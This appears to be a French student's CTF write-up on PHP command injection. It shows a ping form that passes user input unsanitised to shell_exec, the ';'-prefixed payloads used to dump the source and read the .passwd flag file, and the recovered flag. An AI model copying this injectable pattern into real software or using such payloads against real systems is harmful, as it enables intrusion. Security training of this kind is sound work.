Aller au contenu

PHP Injection de commande – Copie

Lien du CTF


Solution

; php -s index.php`
<html>
<head>
<title>Ping Service</title>
</head>
<body>
<form method="POST" action="index.php">
        <input type="text" name="ip" placeholder="127.0.0.1">
        <input type="submit">
</form>
<pre>
<?php 
$flag = "".file_get_contents(".passwd")."";
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
        $response = shell_exec("timeout 5 bash -c 'ping -c 3 ".$_POST["ip"]."'");
        echo $response;
}
?>
</pre>
</body>
</html>

L'analyse du code permet d'identifier le chemin ou se trouve le flag : .passwd.

En faisant la même chose avec cette commande nous devrion strouver le flag :

; cat .passwd

S3rv1ceP1n9Sup3rS3cure

La commande à fonctionnée et renvoie le flag : S3rv1ceP1n9Sup3rS3cure.

CTF Injection de commande

Création du script de scan de vulnérabilités d'injection php TP-01-Injection-de-Commande-Scanner.py

Je n'ai pas réussi à faire la suite de l'exercice...